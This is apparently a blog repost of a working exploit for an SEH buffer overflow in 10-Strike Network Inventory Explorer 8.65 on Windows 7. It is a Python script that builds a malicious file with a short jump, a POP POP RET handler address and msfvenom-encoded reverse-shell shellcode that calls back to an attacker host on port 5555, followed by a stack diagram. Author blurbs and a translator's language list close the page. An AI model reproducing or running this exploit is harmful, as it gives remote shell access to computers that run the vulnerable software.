Date: 2020-12-01
CVE: N/A
Platform: WIN
# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1
import os
import sys
import struct
import socket
crash ="A"* 209
# jmp short 8
# [email protected]:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"
# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")
buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200
f=open("PoC6.txt","w")
f.write(buffer)
f.close()
'''
----------------------------------
| NEXT SEH Pointer |
--|------ ESP | | < ------- A * 209
| |--------------------------------- |
| | SE_Handler ▲ | |
| | #POP #POP #RET | | |
| | -------------------------------| |
| ▼ Stack
|
|
|______ ► -------------------------
| PAYLOAD | -------- ► call | KALI |
__________________________
'''
Just your average information security researcher from Delaware US.
Latest posts by RiSec.Mitch (see all)
- FBI Seizes Stolen Cryptocurrencies - 13 September 2022
- U-Haul data breach, customers’ info exposed - 13 September 2022
- Types of Phishing Attacks & How to Identify Them: The Definitive Guide - 13 September 2022
English
Afrikaans
Albanian
Amharic
Arabic
Armenian
Azerbaijani
Basque
Belarusian
Bengali
Bosnian
Bulgarian
Catalan
Cebuano
Chichewa
Chinese (Simplified)
Chinese (Traditional)
Corsican
Croatian
Czech
Danish
Dutch
Esperanto
Estonian
Filipino
Finnish
French
Frisian
Galician
Georgian
German
Greek
Gujarati
Haitian Creole
Hausa
Hawaiian
Hebrew
Hindi
Hmong
Hungarian
Icelandic
Igbo
Indonesian
Irish
Italian
Japanese
Javanese
Kannada
Kazakh
Khmer
Korean
Kurdish (Kurmanji)
Kyrgyz
Lao
Latin
Latvian
Lithuanian
Luxembourgish
Macedonian
Malagasy
Malay
Malayalam
Maltese
Maori
Marathi
Mongolian
Myanmar (Burmese)
Nepali
Norwegian
Pashto
Persian
Polish
Portuguese
Punjabi
Romanian
Russian
Samoan
Scottish Gaelic
Serbian
Sesotho
Shona
Sindhi
Sinhala
Slovak
Slovenian
Somali
Spanish
Sudanese
Swahili
Swedish
Tajik
Tamil
Telugu
Thai
Turkish
Ukrainian
Urdu
Uzbek
Vietnamese
Welsh
Xhosa
Yiddish
Yoruba
Zulu